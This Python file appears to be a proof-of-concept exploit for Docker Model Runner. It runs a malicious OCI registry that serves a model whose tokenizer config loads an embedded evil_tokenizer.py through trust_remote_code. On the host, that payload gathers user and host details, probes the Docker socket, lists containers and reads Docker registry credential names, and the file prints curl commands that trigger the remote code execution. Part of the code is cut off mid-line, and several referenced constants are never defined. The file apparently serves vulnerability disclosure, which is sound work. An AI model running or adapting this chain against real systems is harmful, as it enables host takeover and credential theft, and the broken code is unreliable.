#!/usr/bin/env python3 # # Malicious OCI registry for the Docker Model Runner PoC. # # Serves a minimal valid Llama model that contains an evil_tokenizer.py. # Every blob's declared digest matches its content. A real attacker would # build it like this. The "no digest verification" claim is proven by static # analysis (see test_claims.py, claims 1a-1c), not by tampering here. # # Introspection endpoints (for the test harness): # /_poc/health status # /_poc/digest_map digest -> content mapping with verification # /_poc/requests request log # /_poc/selftest verify every blob is internally consistent import hashlib import http.server import json import os import struct import sys import threading import time import traceback try: import numpy as np except ImportError: print("ERROR: numpy is required. pip install numpy") sys.exit(1) PORT = int(os.environ.get("REGISTRY_PORT", "5555")) REPO = "evil/rce-model" PROOF_FILE = os.environ.get("PROOF_FILE", "/tmp/poc_rce_proof") request_log = [] request_log_lock = threading.Lock() def sha256_digest(data): return "sha256:" + hashlib.sha256(data).hexdigest() # Payload: runs on the host when vLLM imports it via trust_remote_code. EVIL_TOKENIZER_PY = f"""\ import os import socket import json import time proof = {{ "rce": True, "hostname": socket.gethostname(), "user": os.popen("whoami 2>/dev/null").read().strip(), "uid": os.popen("id 2>/dev/null").read().strip(), "cwd": os.getcwd(), "pid": os.getpid(), "ppid": os.getppid(), "timestamp": time.time(), "env_HOME": os.environ.get("HOME", ""), "model_dir": os.path.dirname(os.path.abspath(__file__)), "can_read_etc_passwd": os.path.exists("/etc/passwd"), "can_write_tmp": os.access("/tmp", os.W_OK), }} # Container escape proof. We're on the host, so if the Docker socket is # reachable we control the whole daemon: enumerate, exec, create new # containers. unpriv container -> host RCE -> daemon -> any container. docker_socket = "/var/run/docker.sock" proof["docker_socket_exists"] = os.path.exists(docker_socket) proof["docker_socket_writable"] = os.access(docker_socket, os.W_OK) docker_ps = os.popen("docker ps --format '{{{{.ID}}}} {{{{.Names}}}} {{{{.Image}}}}' 2>/dev/null").read().strip() proof["docker_ps"] = docker_ps if docker_ps else None proof["docker_ps_count"] = len(docker_ps.strip().split("\\n")) if docker_ps.strip() else 0 docker_version = os.popen("docker version --format '{{{{.Server.Version}}}}' 2>/dev/null").read().strip() proof["docker_version"] = docker_version if docker_version else None # Don't exfiltrate creds, just prove we could read them. docker_config_path = os.path.expanduser("~/.docker/config.json") proof["docker_config_exists"] = os.path.exists(docker_config_path) if os.path.exists(docker_config_path): try: with open(docker_config_path) as dc: docker_cfg = json.load(dc) proof["docker_config_has_auths"] = "auths" in docker_cfg proof["docker_config_registries"] = list(docker_cfg.get("auths", {{}}).keys()) except Exception: proof["docker_config_has_auths"] = None try: with open("{PROOF_FILE}", "w") as f: json.dump(proof, f, indent=2) with open("{PROOF_FILE}.flag", "w") as f: f.write("RCE_CONFIRMED") except Exception as e: import sys print(f"RCE fired but couldn't write proof file: {{e}}", file=sys.stderr) print(json.dumps(proof), file=sys.stderr) from transformers import AutoTokenizer class EvilTokenizer(AutoTokenizer): pass """.encode() # tokenizer_config.json - auto_map points at evil_tokenizer.py. # This is what triggers the code import under trust_remote_code. TOKENIZER_CONFIG = json.dumps({ "auto_map": { "AutoTokenizer": [ "evil_tokenizer.EvilTokenizer", "evil_tokenizer.EvilTokenizer", ] }, "tokenizer_class": "EvilTokenizer", "model_max_length": 2048, }, indent=2).encode() # Minimal valid Llama-architecture weights (safetensors) H, I, V = 64, 128, 32000 TENSORS = { "model.embed_tokens.weight": (V, H), "model.layers.0.self_attn.q_proj.weight": (H, H), "model.layers.0.self_attn.k_proj.weight": (H, H), "model.layers.0.self_attn.v_proj.weight": (H, H), "model.layers.0.self_attn.o_proj.weight": (H, H), "model.layers.0.mlp.gate_proj.weight": (I, H), "model.layers.0.mlp.up_proj.weight": (I, H), "model.layers.0.mlp.down_proj.weight": (H, I), "model.layers.0.input_layernorm.weight": (H,), "model.layers.0.post_attention_layernorm.weight": (H,), "model.norm.weight": (H,), "lm_head.weight": (V, H), } def build_safetensors(): parts = [] header = {"__metadata__": {"format": "pt"}} offset = 0 for name, shape in TENSORS.items(): arr = np.zeros(shape, dtype=np.float32) raw = arr.tobytes() header[name] = { "dtype": "F32", "shape": list(shape), "data_offsets": [offset, offset + len(raw)], } parts.append(raw) offset += len(raw) hdr = json.dumps(header).encode() return struct.pack(" content (each digest matches its content) BLOBS = { sha256_digest(MODEL_CONFIG): MODEL_CONFIG, sha256_digest(SAFETENSORS_BLOB): SAFETENSORS_BLOB, sha256_digest(HF_CONFIG): HF_CONFIG, sha256_digest(TOKENIZER_CONFIG): TOKENIZER_CONFIG, sha256_digest(EVIL_TOKENIZER_PY): EVIL_TOKENIZER_PY, } # Human-readable labels for log lines BLOB_LABELS = { sha256_digest(MODEL_CONFIG): "model-config", sha256_digest(SAFETENSORS_BLOB): "model.safetensors", sha256_digest(HF_CONFIG): "config.json", sha256_digest(TOKENIZER_CONFIG): "tokenizer_config.json", sha256_digest(EVIL_TOKENIZER_PY): "evil_tokenizer.py [PAYLOAD]", } def selftest(): # Verify each blob's declared digest matches its actual content. errors = [] for declared_digest, content in BLOBS.items(): actual = sha256_digest(content) if declared_digest != actual: errors.append(f"MISMATCH: declared={declared_digest[:32]}... actual={actual[:32]}...") manifest_data = json.loads(MANIFEST) config_digest = manifest_data["config"]["digest"] if config_digest not in BLOBS: errors.append(f"Manifest config digest {config_digest[:32]}... not in blob store") for layer in manifest_data["layers"]: layer_digest = layer["digest"] if layer_digest not in BLOBS: errors.append(f"Manifest layer digest {layer_digest[:32]}... not in blob store") actual_size = len(BLOBS.get(layer_digest, b"")) if layer["size"] != actual_size: errors.append(f"Layer {layer_digest[:32]}... size mismatch: " f"manifest={layer['size']} actual={actual_size}") config_data = json.loads(MODEL_CONFIG) for diff_id in config_data["rootfs"]["diff_ids"]: if diff_id not in BLOBS: errors.append(f"Config diff_id {diff_id[:32]}... not in blob store") return errors class Handler(http.server.BaseHTTPRequestHandler): def log_message(self, fmt, *args): msg = fmt % args ts = time.strftime("%H:%M:%S") label = "" if "/blobs/" in self.path: digest = self.path.split("/blobs/")[-1] label = f" [{BLOB_LABELS.get(digest, 'unknown')}]" print(f"[{ts}] {self.client_address[0]} {msg}{label}") with request_log_lock: request_log.append({ "time": time.time(), "method": self.command, "path": self.path, "client": self.client_address[0], }) def _respond(self, code, body=b"", content_type="application/json", headers=None): try: self.send_response(code) self.send_header("Content-Type", content_type) self.send_header("Content-Length", str(len(body))) for k, v in (headers or {}).items(): self.send_header(k, v) self.end_headers() if self.command != "HEAD": self.wfile.write(body) except BrokenPipeError: pass # client gone, normal on HEAD probes def do_GET(self): self._route() def do_HEAD(self): self._route() def _route(self): p = self.path if p.rstrip("/") == "/v2": return self._respond(200, b"{}", headers={ "Docker-Distribution-API-Version": "registry/2.0", }) if p == "/_poc/health": with request_log_lock: blob_reqs = [r for r in request_log if "/blobs/" in r["path"]] manifest_reqs = [r for r in request_log if "/manifests/" in r["path"]] return self._respond(200, json.dumps({ "status": "ok", "port": PORT, "proof_file": PROOF_FILE, "total_requests": len(request_log), "manifest_requests": len(manifest_reqs), "blob_requests": len(blob_reqs), }, indent=2).encode()) if p == "/_poc/requests": with request_log_lock: data = list(request_log) return self._respond(200, json.dumps(data, indent=2).encode()) if p == "/_poc/selftest": errors = selftest() return self._respond(200, json.dumps({ "passed": len(errors) == 0, "errors": errors, "blob_count": len(BLOBS), "manifest_digest": MANIFEST_DIGEST, }, indent=2).encode()) if p == "/_poc/digest_map": digest_map = {} for digest, content in BLOBS.items(): actual = sha256_digest(content) digest_map[digest] = { "label": BLOB_LABELS.get(digest, "unknown"), "declared_digest": digest, "actual_content_digest": actual, "matches": digest == actual, "size": len(content), } return self._respond(200, json.dumps(digest_map, indent=2).encode()) if "/manifests/" in p: return self._respond(200, MANIFEST, content_type="application/vnd.oci.image.manifest.v1+json", headers={"Docker-Content-Digest": MANIFEST_DIGEST}) if "/blobs/" in p: digest = p.split("/blobs/")[-1] blob = BLOBS.get(digest) if blob is not None: return self._respond(200, blob, content_type="application/octet-stream", headers={"Docker-Content-Digest": digest}) return self._respond(404, b'{"errors":[{"code":"BLOB_UNKNOWN"}]}') self._respond(200, b"{}") def main(): errors = selftest() if errors: print("FATAL: registry self-test failed:") for e in errors: print(f" {e}") sys.exit(1) print("=== Docker Model Runner RCE PoC registry ===") print(f"Port: {PORT}") print(f"Proof file: {PROOF_FILE}") print(f"Blobs: {len(BLOBS)} (all digests consistent)") print() print("Model contents:") for digest, label in BLOB_LABELS.items(): print(f" {digest[:24]}... {label} ({len(BLOBS[digest])} bytes)") print() print("Self-test: PASSED") print() print("Use it (two requests = host RCE):") print() print(f" curl -X POST http://model-runner.docker.internal/api/pull \\") print(f" -H 'Content-Type: application/json' \\") print(f" -d '{{\"name\":\"localhost:{PORT}/{REPO}:latest\"}}'") print() print(f" curl -X POST http://model-runner.docker.internal/engines/v1/chat/completions \\") print(f" -H 'Content-Type: application/json' \\") print(f" -d '{{\"model\":\"localhost:{PORT}/{REPO}:latest\",\"messages\":[{{\"role\":\"user\",\"content\":\"hello\"}}]}}'") print() print(f"Then: cat {PROOF_FILE}") print() print(f"Listening on 0.0.0.0:{PORT}...") print() try: http.server.HTTPServer(("0.0.0.0", PORT), Handler).serve_forever() except KeyboardInterrupt: print("\nShutdown.") if __name__ == "__main__": main()